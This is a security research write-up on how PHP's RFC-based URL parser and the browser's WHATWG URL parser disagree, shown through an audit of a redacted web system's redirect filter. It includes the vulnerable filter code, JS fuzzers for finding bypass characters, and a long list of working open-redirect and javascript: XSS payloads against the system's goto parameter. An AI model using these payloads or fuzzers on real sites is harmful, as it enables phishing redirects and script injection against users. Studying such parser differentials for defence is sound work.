A Study of the Inconsistencies Between the WHATWG URL Standard and the RFC URL Standards

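In August 2022, while hunting for bugs on the Topsec (天融信) SRC, I noticed that one of Topsec's sites ran the redacted system, so I downloaded the redacted source code from GitHub and audited it.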

Source & Sink

The audit showed that the redacted system uses a goto parameter in many places to redirect pages, for example in the login feature:

http://demo.redacted.com/login?goto=/

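If an already logged-in user visits this URL, the backend reads the value of the goto parameter and fills it into the custom data-goto attribute of a div tag in the Twig template: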

{% block content %}
<div id="page-message-container" class="page-message-container" data-goto="{{ goto }}" data-duration={{ duration }}>
  <div class="page-message-panel">
    <div class="page-message-heading">
      <h2 class="page-message-title">{{ title|trans }}</h2>
    </div>
    <div class="page-message-body">{{ message|default('')|trans|raw }}</div>
  </div>
</div>
{% endblock %}

The frontend then reads the value of the data-goto attribute with the following JS code and redirects the page through window.location.href:

function (e, t) {
        var n = $("#page-message-container"),
            r = n.data("goto"),
            o = n.data("duration");
        o > 0 && r && setTimeout((function () {
            window.location.href = r
        }), o)
 }

Sanitizer/Filter

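To prevent open redirect (OR) and XSS vulnerabilities during page redirection, redacted implements a dedicated backend filter that sanitizes the URL in the goto parameter: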

    /**
     * Filter a URL.
     *
     * If the URL does not belong to this site's domain, return the site's homepage address.
     *
     * @param $url string the URL to filter
     *
     * @return string
     */
    public function filterRedirectUrl($url)
    {
        $host = $this->get('request_stack')->getCurrentRequest()->getHost();
        $safeHosts = [$host];

        $parsedUrl = parse_url($url);
        $isUnsafeHost = isset($parsedUrl['host']) && !in_array($parsedUrl['host'], $safeHosts);
        $isInvalidUrl = isset($parsedUrl['scheme']) && !in_array($parsedUrl['scheme'], ['http', 'https']);

        if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
            $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
        }

        return strip_tags($url);
    }

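The filter works roughly as follows:
1. Take the Host header from the HTTP request and use it as the host whitelist
2. Set the scheme whitelist: http, https
3. Parse the incoming URL with PHP's URL parser to obtain its host and scheme parts
4. If the host and scheme parts exist, check whether the host is in the host whitelist and whether the scheme is in the scheme whitelist
5. Otherwise, treat the user-supplied URL as a relative URL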

Bypassing the host check

How can the filter's host check be bypassed?
I remembered a payload I had previously used to bypass SSRF filters:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/

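This payload works because it exploits an inconsistency between the backend and frontend URL parsers:

PHP's parse_url takes the host part of the URL to be demo.redacted.com, which matches the Host header of the HTTP request, so the check passes.
The JS URL parser disagrees: it normalizes \ to /, so after parsing, the original payload becomes: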

http://baidu.com/@demo.redacted.com/

The frontend therefore takes the host part of the URL to be baidu.com.

> new URL('http://baidu.com\\@demo.redacted.com/')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/@demo.redacted.com/"
origin: "http://baidu.com"
password: ""
pathname: "/@demo.redacted.com/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""
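
The disagreement can be reproduced without PHP. The sketch below is only an illustration: rfcStyleHost is a hypothetical helper built on the generic regular expression from RFC 3986 Appendix B, used here as a stand-in for an RFC-style parser (it is not how parse_url is implemented), and it is compared with the WHATWG parser exposed as the global URL class.

```javascript
// Generic URI-splitting regular expression from RFC 3986, Appendix B.
const RFC3986_SPLIT = /^(([^:\/?#]+):)?(\/\/([^\/?#]*))?([^?#]*)(\?([^#]*))?(#(.*))?/;

// Hypothetical helper: the host as an RFC-style parser would see it.
function rfcStyleHost(input) {
  const authority = RFC3986_SPLIT.exec(input)[4]; // text between "//" and the next / ? #
  if (authority === undefined) return null;
  const hostPort = authority.slice(authority.lastIndexOf('@') + 1); // drop userinfo
  return hostPort.replace(/:\d*$/, ''); // drop an optional port
}

const payload = 'http://baidu.com\\@demo.redacted.com/'; // contains one literal backslash
const rfcHost = rfcStyleHost(payload);
const whatwgHost = new URL(payload).hostname;

console.log(rfcHost);    // demo.redacted.com
console.log(whatwgHost); // baidu.com
```

The RFC-style split treats the backslash as an ordinary userinfo character, while the WHATWG parser treats it as a path separator for http URLs, so the two sides disagree about which host the URL points to.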

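Bypassing the scheme check

Bypassing the host check alone only yields an open redirect. To get XSS we also need to bypass the backend's scheme check. How?

One way in: vulnerabilities often stem from a program's mistaken assumptions, so we can look for the assumptions the filter gets wrong and then try to break them.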

$parsedUrl = parse_url($url);
$isUnsafeHost = isset($parsedUrl['host']) && ! in_array($parsedUrl['host'], $safeHosts);
$isInvalidUrl = isset($parsedUrl['scheme']) && ! in_array($parsedUrl['scheme'], ['http', 'https']);

if (empty($url) || $isUnsafeHost || $isInvalidUrl) {
    $url = $this->generateUrl('homepage', [], UrlGeneratorInterface::ABSOLUTE_URL);
}
return strip_tags($url);

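Looking at the filter code again, the filter assumes that:
1. If no host and no scheme can be parsed out of the URL, it must be a relative URL.
2. A "relative URL" is always safe.

So what happens if we make parse_url return false?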

false['host'] === NULL
false['scheme'] === NULL

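Both isset() checks then come out false, so the filter concludes that the user-supplied URL has no host and no scheme and is therefore a relative URL! And since a relative URL is assumed to be safe, it is returned to the frontend as-is.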
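
To make the broken assumption concrete, here is a minimal model of the filter's decision in JavaScript. It is a sketch, not the redacted code: filterWouldReject is a hypothetical name, and the parsed argument stands in for whatever PHP's parse_url returned (either false or an object with optional host and scheme keys).

```javascript
// Hypothetical model of the filter's decision. `parsed` mimics the return
// value of PHP's parse_url(): false, or an object with optional keys.
function filterWouldReject(url, parsed, safeHosts) {
  // Models isset($parsedUrl[$key]); on `false` it is always false.
  const isSet = (key) => Boolean(parsed) && parsed[key] !== undefined;

  const isUnsafeHost = isSet('host') && !safeHosts.includes(parsed.host);
  const isInvalidUrl = isSet('scheme') && !['http', 'https'].includes(parsed.scheme);
  const isEmpty = url === '' || url === '0'; // rough model of PHP's empty()

  return isEmpty || isUnsafeHost || isInvalidUrl;
}

const safeHosts = ['demo.redacted.com'];

// A well-formed foreign URL is rejected...
console.log(filterWouldReject('http://baidu.com/', { scheme: 'http', host: 'baidu.com' }, safeHosts)); // true
// ...but a URL on which the parser gave up passes every check.
console.log(filterWouldReject('http:///baidu.com', false, safeHosts)); // false
```

Anything the backend parser fails to split into scheme and host falls through both checks, which is exactly the property the payloads in the rest of this article rely on.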

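How do we make parse_url return false?

The PHP URL parser is only an implementation of the RFC standards, so when the URL passed in is malformed badly enough with respect to the RFC syntax, parse_url returns false.

For example, a classic payload gives an even simpler route to an open redirect: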

https://demo.redacted.com/login?goto=http:///baidu.com

RFC 1738 specifies that in a hierarchical absolute URL, the part following the scheme must begin with //:

The scheme specific data start with a double slash "//" to indicate that it complies with the common Internet scheme syntax.

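So the PHP URL parser treats http:///baidu.com as an invalid URL and returns false; the filter therefore skips the remaining checks and hands the URL back to the frontend.

The frontend URL parser disagrees: it normalizes http:///baidu.com to http://baidu.com: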

> new URL('http:///baidu.com')
URL {origin: 'http://baidu.com', protocol: 'http:', username: '', password: '', host: 'baidu.com', …}
hash: ""
host: "baidu.com"
hostname: "baidu.com"
href: "http://baidu.com/"
origin: "http://baidu.com"
password: ""
pathname: "/"
port: ""
protocol: "http:"
search: ""
searchParams: URLSearchParams {}
username: ""

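The result is an open redirect.

What if we swap the http scheme for the javascript scheme? The RFC only requires that hierarchical URLs carry the // prefix; it does not clearly say how a URL parser should handle a non-hierarchical URL that carries a // prefix.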

javascript:alert(1)
javascript://alert(1)
mailto:happyhacking@qq.com 
mailto://happyhacking@qq.com

That led me to the following payload:

https://demo.redacted.com/login?goto=javascript:///%250dalert(1)

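After the server decodes the query string once (%25 becomes %), the filter receives javascript:///%0dalert(1). The PHP URL parser treats it as an invalid URL and returns false, so the filter skips the scheme check and treats it as a safe "relative URL".

The frontend URL parser, however, has its own ideas.

Reflected to the frontend, the payload looks like this: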

window.location.href = 'javascript:///%0dalert(1)'

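The frontend URL parser finds the scheme javascript, so the browser percent-decodes the rest of the URL, turning %0d into \r (a carriage return, which JavaScript treats as a line terminator), and hands it to the JS engine. The JS engine sees // as the start of a single-line comment and alert(1) as the next line of code after the line break.

The result is XSS.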
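
The comment-plus-line-terminator trick can be checked outside a browser. The sketch below approximates what happens to a javascript: URL: simulateJavascriptUrl is a hypothetical helper, decodeURIComponent stands in for the browser's percent-decoding, and a stub passed in as alert records calls instead of opening a dialog.

```javascript
// Hypothetical helper: approximate how a javascript: URL body is executed.
function simulateJavascriptUrl(url) {
  const calls = [];
  const encodedBody = url.slice('javascript:'.length); // everything after the scheme
  const source = decodeURIComponent(encodedBody);      // stand-in for the browser's percent-decoding
  // Run the decoded source with a stub `alert` that records its arguments.
  new Function('alert', source)((value) => calls.push(value));
  return calls;
}

// %0d decodes to CR, which ends the "//" comment, so alert(1) runs.
console.log(simulateJavascriptUrl('javascript:///%0dalert(1)')); // [ 1 ]
// With a space instead of CR, the comment swallows the whole line.
console.log(simulateJavascriptUrl('javascript:///%20alert(1)')); // []
```

The payload double-encodes the carriage return as %250d so that it survives as the literal text %0d until this final decoding step.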

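Further research

Could we write a fuzzer to uncover more inconsistencies between the JS URL parser and the PHP URL parser?

http:{char}//localhost:80/xxxx

Is there a character that, placed at {char} between http: and //, still leaves the frontend URL parser treating localhost as the host part of the URL?

The fuzzer: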

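var log = []; // var, so the snippet can be re-run in the same console session
// Try every Unicode code point between "http:" and "//".
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL('http:' + String.fromCodePoint(i) + '//localhost:80/xxxx');
    if (url.host === 'localhost') {
      console.log(i + ':URL encoded i : ' + encodeURI(String.fromCodePoint(i)));
      log.push(i);
    }
  } catch (e) {} // the parser rejected this input; skip it
}
log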

Result from the frontend URL parser:

9: URL encoded i : %09 -> http:%09//localhost
10: URL encoded i : %0A -> http:%0a//localhost
13: URL encoded i : %0D -> http:%0d//localhost
47: URL encoded i : / -> http:///localhost
92: URL encoded i : %5C -> http:\//localhost

And how does the PHP URL parser parse them?

 ["http:%09//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%09//localhost"
  }
  ["http:   //localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "   //localhost"
  }
  ["http:%0a//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(14) "%0a//localhost"
  }
  ["http:\//localhost"]=>
  array(2) {
    ["scheme"]=>
    string(4) "http"
    ["path"]=>
    string(12) "\//localhost"
  }
  ["http:///localhost"]=>
  bool(false)

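So when faced with these payloads, the PHP URL parser either treats everything after http: as the path, or considers the URL invalid and returns false.

In other words, the following payloads also bypass the redacted filter and lead to an open redirect: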

https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com

http{char}://localhost:80/xxxx

Is there a character that, placed between http and ://, still leaves the frontend URL parser treating localhost as the host part and http as the scheme?

fuzzer:

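var log = []; // var, so the snippet can be re-run in the same console session
// Try every Unicode code point between "http" and "://".
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL('http' + String.fromCodePoint(i) + '://localhost:80/xxxx');
    if (url.host === 'localhost' && url.protocol === 'http:') {
      console.log('i: ' + i + ' URL encoded i : ' + encodeURI(String.fromCodePoint(i)));
      console.log(url);
      log.push(i);
    }
  } catch (e) {} // the parser rejected this input; skip it
}
log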

Result from the frontend URL parser:

9:  URL encoded i : %09
10:  URL encoded i : %0A
13:  URL encoded i : %0D

This time only three characters turned up, with / and \ no longer among them, which gives the following three payloads:

http%09://baidu.com
http%0a://baidu.com
http%0d://baidu.com

And how does the PHP URL parser parse them?

  ["http%09://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%09://localhost:80/xxx"
  }
  ["http%0a://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0a://localhost:80/xxx"
  }
  ["http%0d://localhost:80/xxx"]=>
  array(1) {
    ["path"]=>
    string(26) "http%0d://localhost:80/xxx"
  }

PHP treats the whole URL as the path, that is, as a relative URL.

That bypasses both the filter's scheme check and its host check at once:

window.location.href='http\n://localhost:80/xxx' // works!
window.location.href='javascript\n:alert(1)' // works!
window.location.href='javascript\r:alert(1)' // works!
window.location.href='javascript\t:alert(1)' // works!

payload:

https://demo.redacted.com/login?goto=javascript%0d:alert(1) // works!
https://demo.redacted.com/login?goto=javascript%0a:alert(1) // works!
https://demo.redacted.com/login?goto=javascript%09:alert(1) // works!
https://demo.redacted.com/login?goto=http%09://baidu.com // works!

{char}http://localhost:80/xxxx

Is there a character that, placed before the http scheme, still leaves the frontend URL parser treating localhost as the host part and http as the scheme?

var log = []; // var, so the snippet can be re-run in the same console session
// Try every Unicode code point in front of the scheme.
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL(String.fromCodePoint(i) + 'http://localhost:80/xxxx');
    if (url.host === 'localhost' && url.protocol === 'http:') {
      console.log(`i: ${i} ,URL encoded i : ` + encodeURI(String.fromCodePoint(i)) + ' string begin:' + String.fromCodePoint(i) + 'string end');
      log.push(i);
    }
  } catch (e) {} // the parser rejected this input; skip it
}
log
// Turn every hit into a payload.
log.forEach((i) => {
  //console.log(encodeURI(String.fromCodePoint(i)) + 'http://localhost:80/xxxx')
  console.log(encodeURI(String.fromCodePoint(i)) + 'javascript:alert(1)');
});

This generated the following payloads:

%00http://localhost:80/xxxx
%01http://localhost:80/xxxx
%02http://localhost:80/xxxx
%03http://localhost:80/xxxx
%04http://localhost:80/xxxx
%05http://localhost:80/xxxx
%06http://localhost:80/xxxx
%07http://localhost:80/xxxx
%08http://localhost:80/xxxx
%09http://localhost:80/xxxx
%0Ahttp://localhost:80/xxxx
%0Bhttp://localhost:80/xxxx
%0Chttp://localhost:80/xxxx
%0Dhttp://localhost:80/xxxx
%0Ehttp://localhost:80/xxxx
%0Fhttp://localhost:80/xxxx
%10http://localhost:80/xxxx
%11http://localhost:80/xxxx
%12http://localhost:80/xxxx
%13http://localhost:80/xxxx
%14http://localhost:80/xxxx
%15http://localhost:80/xxxx
%16http://localhost:80/xxxx
%17http://localhost:80/xxxx
%18http://localhost:80/xxxx
%19http://localhost:80/xxxx
%1Ahttp://localhost:80/xxxx
%1Bhttp://localhost:80/xxxx
%1Chttp://localhost:80/xxxx
%1Dhttp://localhost:80/xxxx
%1Ehttp://localhost:80/xxxx
%1Fhttp://localhost:80/xxxx
%20http://localhost:80/xxxx

Replacing the http scheme with the javascript scheme:

%00javascript:alert(1)
%01javascript:alert(1)
%02javascript:alert(1)
%03javascript:alert(1)
%04javascript:alert(1)
%05javascript:alert(1)
%06javascript:alert(1)
%07javascript:alert(1)
%08javascript:alert(1)
%09javascript:alert(1)
%0Ajavascript:alert(1)
%0Bjavascript:alert(1)
%0Cjavascript:alert(1)
%0Djavascript:alert(1)
%0Ejavascript:alert(1)
%0Fjavascript:alert(1)
%10javascript:alert(1)
%11javascript:alert(1)
%12javascript:alert(1)
%13javascript:alert(1)
%14javascript:alert(1)
%15javascript:alert(1)
%16javascript:alert(1)
%17javascript:alert(1)
%18javascript:alert(1)
%19javascript:alert(1)
%1Ajavascript:alert(1)
%1Bjavascript:alert(1)
%1Cjavascript:alert(1)
%1Djavascript:alert(1)
%1Ejavascript:alert(1)
%1Fjavascript:alert(1)
%20javascript:alert(1)

And how does the PHP URL parser parse them?

  ["%00http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%00http://localhost:80/xxxx"
  }
  ["%01http://localhost:80/xxxx"]=>
  array(1) {
    ["path"]=>
    string(27) "%01http://localhost:80/xxxx"
  }
  ["%1Djavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Djavascript:alert(1)"
  }
  ["%1Ejavascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "%1Ejavascript:alert(1)"
  }

The PHP URL parser treats the whole URL as a relative URL.

So all of the following payloads bypass both the scheme check and the host check of the redacted filter:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)

ht{char}tp://localhost:80/xxxx

Let's be bolder: is there a character that, placed between ht and tp, still leaves the frontend URL parser treating http as the scheme and localhost as the host part?

The fuzzer:

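var log = []; // var, so the snippet can be re-run in the same console session
// Try every Unicode code point in the middle of the scheme name.
for (let i = 0; i <= 0x10ffff; i++) {
  try {
    const url = new URL('ht' + String.fromCodePoint(i) + 'tp://localhost:80/xxxx');
    if (url.host === 'localhost' && url.protocol === 'http:') {
      console.log('i: ' + i + ' URL encoded i : ' + encodeURI(String.fromCodePoint(i)));
      console.log(url);
      log.push(i);
    }
  } catch (e) {} // the parser rejected this input; skip it
}
log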

Result:

i: 9 URL encoded i : %09
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 10 URL encoded i : %0A
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
i: 13 URL encoded i : %0D
URL { href: "http://localhost/xxxx", origin: "http://localhost", protocol: "http:", username: "", password: "", host: "localhost", hostname: "localhost", port: "", pathname: "/xxxx", search: "" }
Array(3) [ 9, 10, 13 ]
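
All of the fuzzers in this section share one shape: splice a single code point into a fixed position and keep it if the WHATWG parser still sees the intended URL. A reusable version might look like the sketch below; fuzzInsertion and isHttpLocalhost are hypothetical names, and the maxCodePoint parameter is only there to allow quick runs over a smaller range.

```javascript
// Hypothetical generic fuzzer: insert each code point between `prefix` and
// `suffix` and collect those for which `accept(parsedUrl)` returns true.
function fuzzInsertion(prefix, suffix, accept, maxCodePoint = 0x10ffff) {
  const hits = [];
  for (let cp = 0; cp <= maxCodePoint; cp++) {
    let parsed;
    try {
      parsed = new URL(prefix + String.fromCodePoint(cp) + suffix);
    } catch {
      continue; // the parser rejected this input
    }
    if (accept(parsed)) hits.push(cp);
  }
  return hits;
}

const isHttpLocalhost = (u) => u.host === 'localhost' && u.protocol === 'http:';

// ASCII-only runs of three of the experiments in this section.
console.log(fuzzInsertion('http:', '//localhost:80/xxxx', isHttpLocalhost, 0x7f));
console.log(fuzzInsertion('http', '://localhost:80/xxxx', isHttpLocalhost, 0x7f));
console.log(fuzzInsertion('ht', 'tp://localhost:80/xxxx', isHttpLocalhost, 0x7f));
```

Dropping the last argument scans the full Unicode range, as the fuzzers in this section do.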

This gives the following payloads:

ht%0dtp://localhost
ht%0atp://localhost
ht%09tp://localhost
java%09script:alert(1)
java%0dscript:alert(1)
java%0ascript:alert(1)

And how does the PHP URL parser handle these malformed URLs?

  ["ht%0dtp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0dtp://localhost"
  }
  ["ht%0atp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%0atp://localhost"
  }
  ["ht%09tp://localhost"]=>
  array(1) {
    ["path"]=>
    string(19) "ht%09tp://localhost"
  }
  ["java%09script:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%09script:alert(1)"
  }
  ["java%0dscript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0dscript:alert(1)"
  }
  ["java%0ascript:alert(1)"]=>
  array(1) {
    ["path"]=>
    string(22) "java%0ascript:alert(1)"
  }

Once again the PHP URL parser treats these URLs as "well-formed" relative URLs, and all of them pass the redacted filter:

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)

In fact, these three characters can be placed anywhere in the scheme:

https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

Summary of payloads

By digging further into the inconsistencies between the JavaScript URL parser and the PHP URL parser, I found more than forty ways to bypass the redacted filter:

https://demo.redacted.com/login?goto=http://baidu.com\@demo.redacted.com/
https://demo.redacted.com/login?goto=javascript:///%250dalert(1)
https://demo.redacted.com/login?goto=http:///www.baidu.com
https://demo.redacted.com/login?goto=http:\//www.baidu.com
https://demo.redacted.com/login?goto=http:%0d\\www.baidu.com
https://demo.redacted.com/login?goto=http:%0a\\www.baidu.com
https://demo.redacted.com/login?goto=http:%09\\www.baidu.com
https://demo.redacted.com/login?goto=javascript%0d:alert(1) 
https://demo.redacted.com/login?goto=javascript%0a:alert(1) 
https://demo.redacted.com/login?goto=javascript%09:alert(1) 
https://demo.redacted.com/login?goto=http%09://baidu.com 
https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
https://demo.redacted.com/login?goto=%03javascript:alert(1)
https://demo.redacted.com/login?goto=%04javascript:alert(1)
https://demo.redacted.com/login?goto=%05javascript:alert(1)
https://demo.redacted.com/login?goto=%06javascript:alert(1)
https://demo.redacted.com/login?goto=%07javascript:alert(1)
https://demo.redacted.com/login?goto=%08javascript:alert(1)
https://demo.redacted.com/login?goto=%09javascript:alert(1)
https://demo.redacted.com/login?goto=%0Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%0Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%0Djavascript:alert(1)
https://demo.redacted.com/login?goto=%0Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%0Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%10javascript:alert(1)
https://demo.redacted.com/login?goto=%11javascript:alert(1)
https://demo.redacted.com/login?goto=%12javascript:alert(1)
https://demo.redacted.com/login?goto=%13javascript:alert(1)
https://demo.redacted.com/login?goto=%14javascript:alert(1)
https://demo.redacted.com/login?goto=%15javascript:alert(1)
https://demo.redacted.com/login?goto=%16javascript:alert(1)
https://demo.redacted.com/login?goto=%17javascript:alert(1)
https://demo.redacted.com/login?goto=%18javascript:alert(1)
https://demo.redacted.com/login?goto=%19javascript:alert(1)
https://demo.redacted.com/login?goto=%1Ajavascript:alert(1)
https://demo.redacted.com/login?goto=%1Bjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Cjavascript:alert(1)
https://demo.redacted.com/login?goto=%1Djavascript:alert(1)
https://demo.redacted.com/login?goto=%1Ejavascript:alert(1)
https://demo.redacted.com/login?goto=%1Fjavascript:alert(1)
https://demo.redacted.com/login?goto=%20javascript:alert(1)
https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

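Root cause

Why do the JavaScript URL parser and the PHP URL parser disagree so much?

Because two URL parsing standards coexist: the RFC standards and the WHATWG standard. Building on the RFCs, the WHATWG wrote its own standard, which includes a section on URL parsing.

Browser-side JavaScript URL parsers follow the WHATWG standard, whereas the PHP URL parser follows the RFC specifications. Node.js ships both kinds of parser, url.parse and new URL: the former follows the RFC standards and the latter follows the WHATWG standard.

The WHATWG URL parsing section states: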

If input contains any leading or trailing C0 control or space, validation error.

Remove any leading and trailing C0 control or space from input.

If the input URL has C0 controls or spaces at its start or end, the parser reports a validation error and then removes all leading and trailing C0 controls and spaces. C0 controls cover 0x00-0x1F and space is 0x20, so "C0 control or space" covers 0x00-0x20.

What is a validation error?

A validation error indicates a mismatch between input and valid input. User agents, especially conformance checkers, are encouraged to report them somewhere. A validation error does not mean that the parser terminates. Termination of a parser is always stated explicitly, e.g., through a return statement.

A validation error only signals a mismatch between the input and valid input; it does not mean that parsing stops. The standard merely encourages implementers to report it somewhere.

This is why the following payloads work:

https://demo.redacted.com/login?goto=%00javascript:alert(1)
https://demo.redacted.com/login?goto=%01javascript:alert(1)
https://demo.redacted.com/login?goto=%02javascript:alert(1)
...
https://demo.redacted.com/login?goto=%20javascript:alert(1)
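
The leading-character rule is easy to confirm against any WHATWG-conformant parser. The sketch below, with leadingCharsIgnored as a hypothetical helper name, prepends every code point in 0x00-0x20 to a javascript: URL and records which ones leave the parsed scheme unchanged.

```javascript
// Hypothetical helper: which leading code points in 0x00-0x20 does the
// WHATWG parser strip before it reads the scheme?
function leadingCharsIgnored(target = 'javascript:alert(1)') {
  const ignored = [];
  for (let cp = 0x00; cp <= 0x20; cp++) {
    try {
      const parsed = new URL(String.fromCodePoint(cp) + target);
      if (parsed.protocol === 'javascript:') ignored.push(cp);
    } catch {
      // the parser rejected this input
    }
  }
  return ignored;
}

const ignored = leadingCharsIgnored();
console.log(ignored.length); // 33, i.e. every code point from 0x00 to 0x20
```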

The standard also states:

If input contains any ASCII tab or newline, validation error.

Remove all ASCII tab or newline from input.

So which characters count as an ASCII tab or newline?

An ASCII tab or newline is U+0009 TAB, U+000A LF, or U+000D CR.

So in the payloads below, %0d, %0a and %09 (once the server has decoded them to raw CR, LF and TAB) are all removed by the JavaScript URL parser:

https://demo.redacted.com/login?goto=ht%0dtp://baidu.com
https://demo.redacted.com/login?goto=ht%0atp://baidu.com
https://demo.redacted.com/login?goto=ht%09tp://baidu.com
https://demo.redacted.com/login?goto=java%09script:alert(1)
https://demo.redacted.com/login?goto=java%0dscript:alert(1)
https://demo.redacted.com/login?goto=java%0ascript:alert(1)
https://demo.redacted.com/login?goto=java%0asc%0aript:alert(1)

In other words, these three characters can be placed anywhere in a URL to obfuscate it, since the JavaScript URL parser removes them anyway. For example:

new URL('http:/\x09/baidu.com') 

URL {
    origin: 'http://baidu.com', 
    protocol: 'http:', 
    username: '', 
    password: '', 
    host: 'baidu.com'
}
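
The "anywhere" claim can be tested mechanically. In the sketch below, survivesInjection is a hypothetical helper that inserts one character at every possible index of a URL and checks that the WHATWG parser still produces the same href.

```javascript
// Hypothetical helper: does inserting `ch` at any index of `base` leave the
// parsed href unchanged?
function survivesInjection(base, ch) {
  const expected = new URL(base).href;
  for (let i = 0; i <= base.length; i++) {
    const mutated = base.slice(0, i) + ch + base.slice(i);
    try {
      if (new URL(mutated).href !== expected) return false;
    } catch {
      return false; // the parser rejected the mutated URL
    }
  }
  return true;
}

for (const ch of ['\t', '\n', '\r']) {
  console.log(JSON.stringify(ch), survivesInjection('http://baidu.com/', ch)); // true for all three
}
// A space is only stripped at the very start or end, so it fails elsewhere.
console.log(survivesInjection('http://baidu.com/', ' ')); // false
```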

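Conclusion

Few things are worse than having two standards for the same thing: if the standards are inconsistent, the implementations are bound to be inconsistent too. The security problems this causes are well hidden, because when you audit a single system you see nothing wrong, yet once several systems are wired together the problems appear. It also shows that a security audit has to take the whole picture into account rather than looking at one system in isolation.

It is also worth noting that wherever a standard or specification is silent or ambiguous, the developers who implement it will understand it differently, which leads to inconsistencies among the languages, libraries, frameworks and software that follow the standard. These inconsistencies are fertile ground for new attack techniques.

+-------------------------------------------------------+
| Two competing standards / ambiguity in a standard /   |
| gaps in a standard / different versions of a standard |
+-------------------------------------------------------+
                            |
                            v
            +------------------------------+
            | Inconsistent implementations |
            +------------------------------+
                            |
                            v
        +---------------------------------------+
        | Bypass tricks / new attack techniques |
        +---------------------------------------+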
